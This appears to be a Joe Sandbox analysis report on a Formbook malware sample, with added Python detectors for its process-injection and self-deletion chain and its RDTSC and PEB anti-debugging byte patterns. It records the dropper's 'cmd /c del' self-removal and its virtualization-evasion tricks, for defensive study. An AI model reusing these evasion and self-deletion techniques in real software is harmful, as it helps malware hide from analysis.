          Source: 0000000D.00000002.509446252.00000000032A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.246218201.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000001.246218201.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/0@13/5
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2196:120:WilError_01
          Source: pMbPS8nCm1.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\raserver.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\raserver.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: pMbPS8nCm1.exe | Virustotal: Detection: 26%
          Source: pMbPS8nCm1.exe | ReversingLabs: Detection: 41%
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | File read: C:\Users\user\Desktop\pMbPS8nCm1.exe
          Source: unknown | Process created: C:\Users\user\Desktop\pMbPS8nCm1.exe 'C:\Users\user\Desktop\pMbPS8nCm1.exe'
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Process created: C:\Users\user\Desktop\pMbPS8nCm1.exe 'C:\Users\user\Desktop\pMbPS8nCm1.exe'
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
          Source: C:\Windows\SysWOW64\raserver.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\pMbPS8nCm1.exe'
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Process created: C:\Users\user\Desktop\pMbPS8nCm1.exe 'C:\Users\user\Desktop\pMbPS8nCm1.exe'
          Source: C:\Windows\SysWOW64\raserver.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\pMbPS8nCm1.exe'
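          The process-creation lines above are the part of this report that maps most directly onto an endpoint detection: the dropper re-launches itself (the hollowed child), the injected explorer.exe starts C:\Windows\SysWOW64\raserver.exe with no arguments, and raserver.exe runs cmd.exe /c del against the dropper to remove it from disk. The Python below is an added example, not part of the Joe Sandbox report or of the sample. It runs two checks over Sysmon-style process-creation records and correlates the deletion target with the images of processes already seen in the same batch. The record layout (pid, ppid, parent, image, cmd), the pids and the benign notepad.exe record are constructed for the demo.

```python
r"""Added example, not part of the Joe Sandbox report or of the sample.

Detects the execution chain recorded above over Sysmon-style
process-creation records (Event ID 1 style fields):
  explorer.exe      -> C:\Windows\SysWOW64\<system binary>   (no arguments)
  <system binary>   -> cmd.exe /c del '<dropper path>'       (self-deletion)
The records in EVENTS are constructed for this demo; pids are invented.
"""
from __future__ import annotations
import re

SYSWOW64 = "C:\\Windows\\SysWOW64\\"
WINDOWS = "C:\\Windows\\"

# cmd.exe /c del [/switches] 'path' | "path" | path
DEL_RE = re.compile(r"/c\s+del\s+(?:/\w+\s+)*['\"]?([^'\"]+?)['\"]?\s*$", re.IGNORECASE)


def _under(path: str, prefix: str) -> bool:
    return path.lower().startswith(prefix.lower())


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def explorer_spawns_syswow64_binary(ev: dict) -> bool:
    """explorer.exe starting a 32-bit system binary with no arguments. That is
    not how raserver.exe (a DCOM server) is normally launched; the injected
    explorer.exe in this report does it to obtain a trusted-looking host."""
    return (_basename(ev["parent"]) == "explorer.exe"
            and _under(ev["image"], SYSWOW64)
            and ev["cmd"].strip().strip('"').lower() == ev["image"].lower())


def self_delete_target(ev: dict) -> str | None:
    """Return the path a 'cmd.exe /c del ...' invocation removes, else None."""
    if _basename(ev["image"]) != "cmd.exe":
        return None
    m = DEL_RE.search(ev["cmd"])
    return m.group(1) if m else None


def detect(events: list[dict]) -> list[tuple[str, int, str]]:
    """Return (severity, pid, reason) findings for a batch of events."""
    seen_images = {e["image"].lower() for e in events}
    findings = []
    for ev in events:
        if explorer_spawns_syswow64_binary(ev):
            findings.append(("medium", ev["pid"],
                             "explorer.exe spawned a SysWOW64 binary with no arguments: " + ev["image"]))
        target = self_delete_target(ev)
        if target:
            # A Windows system binary deleting a file that was itself a running
            # process in this batch is the dropper cleaning up after injection.
            system_parent = _under(ev["parent"], WINDOWS)
            deletes_seen_process = target.lower() in seen_images
            if not (system_parent or deletes_seen_process):
                continue
            sev = "high" if (system_parent and deletes_seen_process) else "medium"
            findings.append((sev, ev["pid"],
                             f"cmd.exe /c del {target} launched by {ev['parent']}"))
    return findings


_EXPLORER = "C:\\Windows\\explorer.exe"
_DROPPER = "C:\\Users\\user\\Desktop\\pMbPS8nCm1.exe"
_RASERVER = "C:\\Windows\\SysWOW64\\raserver.exe"
_CMD = "C:\\Windows\\SysWOW64\\cmd.exe"

EVENTS = [  # constructed records modelled on the report's process tree; pids invented
    {"pid": 1001, "ppid": 900, "parent": _EXPLORER, "image": _DROPPER, "cmd": f"'{_DROPPER}'"},
    {"pid": 1002, "ppid": 1001, "parent": _DROPPER, "image": _DROPPER, "cmd": f"'{_DROPPER}'"},
    {"pid": 2001, "ppid": 900, "parent": _EXPLORER, "image": _RASERVER, "cmd": _RASERVER},
    {"pid": 2002, "ppid": 2001, "parent": _RASERVER, "image": _CMD, "cmd": f"/c del '{_DROPPER}'"},
    {"pid": 2003, "ppid": 2002, "parent": _CMD, "image": "C:\\Windows\\System32\\conhost.exe",
     "cmd": "C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"},
    # benign: the user opens a text file from the desktop
    {"pid": 3001, "ppid": 900, "parent": _EXPLORER, "image": "C:\\Windows\\System32\\notepad.exe",
     "cmd": "C:\\Windows\\System32\\notepad.exe C:\\Users\\user\\notes.txt"},
]

if __name__ == "__main__":
    for sev, pid, reason in detect(EVENTS):
        print(f"[{sev}] pid {pid}: {reason}")
```

          Run as a script it reports the raserver.exe launch as medium and the cmd.exe deletion as high; conhost.exe and the notepad.exe launch produce nothing. The first rule on its own is a lead rather than a verdict (a user can start a 32-bit system binary from Explorer), which is why the deletion is escalated only when the deleted file was itself a process in the same batch and the deleting cmd.exe has a system binary as parent.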
          Source: Binary string: wntdll.pdbUGP source: pMbPS8nCm1.exe, 00000001.00000003.245067685.0000000002480000.00000004.00000001.sdmp, pMbPS8nCm1.exe, 00000002.00000002.306527493.0000000000A10000.00000040.00000001.sdmp, raserver.exe, 0000000D.00000002.511116133.0000000004D4F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: pMbPS8nCm1.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: pMbPS8nCm1.exe, 00000002.00000002.308172933.0000000000D70000.00000040.00000001.sdmp
          Source: Binary string: RAServer.pdbGCTL source: pMbPS8nCm1.exe, 00000002.00000002.308172933.0000000000D70000.00000040.00000001.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Unpacked PE file: 2.2.pMbPS8nCm1.exe.400000.0.unpack .text:ER;.rdata:R; vs .text:ER;
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Code function: 2_2_004062F6 pushfd ; ret
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Code function: 2_2_0041B3C5 push eax; ret
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Code function: 2_2_004153FC push eax; retf
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Code function: 2_2_0041B47C push eax; ret
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Code function: 2_2_0041B412 push eax; ret
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Code function: 2_2_0041B41B push eax; ret
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Code function: 2_2_00415CE7 pushad ; ret
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Code function: 2_2_0041C4EE push 133511A3h; retf
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Code function: 2_2_00414D71 push ss; iretd
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Code function: 2_2_00415D38 pushad ; ret
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CAD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_009A62F6 pushfd ; ret
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_009BB3C5 push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_009B53FC push eax; retf
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_009BC4EE push 133511A3h; retf
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_009B5CE7 pushad ; ret
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_009BB41B push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_009BB412 push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_009BB47C push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_009B5D38 pushad ; ret
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_009B4D71 push ss; iretd
          Source: C:\Windows\SysWOW64\raserver.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\raserver.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\raserver.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\raserver.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\raserver.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | RDTSC instruction interceptor: First address: 00000000004085F4, second address: 00000000004085FA, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | RDTSC instruction interceptor: First address: 000000000040898E, second address: 0000000000408994, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exe | RDTSC instruction interceptor: First address: 00000000009A85F4, second address: 00000000009A85FA, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exe | RDTSC instruction interceptor: First address: 000000000040898E, second address: 00000000009A8994, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Code function: 2_2_004088C0 rdtsc
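          The RDTSC interceptor lines give the exact byte sequence of the sample's timing probe: rdtsc, xor ecx, ecx, add ecx, eax, rdtsc, with the two rdtsc instructions six bytes apart (0x4085F4 and 0x4085FA in the dropper, the same code at 0x9A85F4 once injected into raserver.exe). The Python below is an added example, not part of the report or of the sample: it scans a code dump for that eight-byte sequence, for any two rdtsc opcodes within a short gap (to catch variants that change the arithmetic between the reads), and for the mov eax/ecx, dword ptr fs:[30h] PEB reads that appear further down in this section. The input bytes are constructed for the demo and the 0x401000 base address is an assumption, not the sample's.

```python
"""Added example, not part of the sandbox report or of the sample.

Scans a code dump for two anti-analysis idioms this report attributes to
the sample: the RDTSC timing probe (rdtsc; xor ecx,ecx; add ecx,eax; rdtsc)
and direct PEB reads via mov r32, dword ptr fs:[30h]. SAMPLE is constructed
for the demo; the 0x401000 base used below is assumed, not the sample's.
"""
from __future__ import annotations
import re
from dataclasses import dataclass

RDTSC = b"\x0f\x31"

# rdtsc / xor ecx,ecx (31 C9 or 33 C9) / add ecx,eax (01 C1 or 03 C8) / rdtsc:
# the 8-byte sequence the report shows, second rdtsc 6 bytes after the first.
RDTSC_DELTA = re.compile(rb"\x0f\x31(?:\x31\xc9|\x33\xc9)(?:\x01\xc1|\x03\xc8)\x0f\x31")

# mov eax, fs:[30h] = 64 A1 30 00 00 00; mov r32, fs:[30h] = 64 8B /r 30 00 00 00
# (in a 32-bit process fs:[0x30] is the TEB's PEB pointer; PEB+2 is BeingDebugged).
PEB_READ = re.compile(rb"\x64(?:\xa1|\x8b[\x05\x0d\x15\x1d\x35\x3d])\x30\x00\x00\x00")


@dataclass(frozen=True)
class Hit:
    kind: str      # "rdtsc_delta" or "peb_fs30"
    offset: int    # offset into the dump
    va: int        # base + offset
    length: int


def scan(code: bytes, base: int = 0) -> list[Hit]:
    """Exact-pattern hits, sorted by offset."""
    hits = [Hit("rdtsc_delta", m.start(), base + m.start(), m.end() - m.start())
            for m in RDTSC_DELTA.finditer(code)]
    hits += [Hit("peb_fs30", m.start(), base + m.start(), m.end() - m.start())
             for m in PEB_READ.finditer(code)]
    return sorted(hits, key=lambda h: h.offset)


def rdtsc_pairs(code: bytes, max_gap: int = 16) -> list[tuple[int, int]]:
    """Looser check: any two rdtsc opcodes at most max_gap bytes apart.
    Catches variants that change the arithmetic between the reads; 0F 31 can
    also occur inside other instructions or data, so treat hits as leads."""
    offsets = []
    i = code.find(RDTSC)
    while i != -1:
        offsets.append(i)
        i = code.find(RDTSC, i + 1)
    return [(a, b) for a, b in zip(offsets, offsets[1:]) if b - a <= max_gap]


SAMPLE = (  # constructed bytes, not taken from the sample
    b"\x55\x8b\xec"                         # push ebp; mov ebp, esp
    b"\x0f\x31\x31\xc9\x01\xc1\x0f\x31"     # rdtsc; xor ecx,ecx; add ecx,eax; rdtsc
    b"\x2b\xc1"                             # sub eax, ecx  (elapsed cycles)
    b"\x90\x90\x90\x90"                     # nop padding
    b"\x64\xa1\x30\x00\x00\x00"             # mov eax, dword ptr fs:[30h]  (PEB)
    b"\x0f\xb6\x40\x02"                     # movzx eax, byte ptr [eax+2]  (BeingDebugged)
    b"\xc3"                                 # ret
)

if __name__ == "__main__":
    for h in scan(SAMPLE, base=0x401000):
        print(f"{h.kind:12s} VA 0x{h.va:08X} ({h.length} bytes)")
    print("rdtsc pairs:", rdtsc_pairs(SAMPLE))
```

          Point scan() at a raw memory dump of the unpacked payload with the region's base address and it prints the virtual addresses of both idioms; on the constructed input it reports the RDTSC probe at 0x401003 and the PEB read at 0x401011. The looser rdtsc_pairs() check is deliberately noisy, so it is a triage aid for dumps where the exact eight-byte sequence was changed, not a signature on its own.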
          Source: C:\Windows\explorer.exe, TID: 5164 | Thread sleep time: -45000s >= -30000s
          Source: C:\Windows\SysWOW64\raserver.exe, TID: 4616 | Thread sleep time: -42000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\raserver.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\raserver.exe | Last function: Thread delayed
          Source: explorer.exe, 00000003.00000000.283051381.000000000113D000.00000004.00000020.sdmp | Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}efb8b}
          Source: explorer.exe, 00000003.00000000.269510114.000000000891C000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.267438419.0000000008270000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: raserver.exe, 0000000D.00000002.509359980.000000000308F000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW+^
          Source: raserver.exe, 0000000D.00000002.509236536.0000000003062000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000000.283272252.00000000011B3000.00000004.00000020.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000003.00000000.269723701.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000003.00000000.261687193.00000000053C4000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000003.00000000.267438419.0000000008270000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.267438419.0000000008270000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.269723701.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: explorer.exe, 00000003.00000000.267438419.0000000008270000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\raserver.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Code function: 2_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Code function: 2_2_00409B30 LdrLoadDll
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 1_2_006E06DA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 1_2_006E08EE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 1_2_006E09DE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 1_2_006E099F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 1_2_006E0A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D28CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CEB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CEB8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CEB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CEB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CEB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CEB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D114FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CD6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CD6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CD6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C59080 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CD3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CD3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C6849B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C990AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C8F0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C8F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C8F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C8A44B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C70050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C70050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CEC450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CEC450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D12073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D21074 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C7746D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D24015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D24015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CD6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CD6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CD6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CD6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CD7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CD7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CD7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D2740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D2740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D2740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C8BC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C8002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C8002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C8002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C8002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C8002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C6B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C6B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C6B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C6B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04D08DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C5B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C5B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04C5B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 13_2_04CE41E8 mov eax, dword ptr fs:[00000030h]
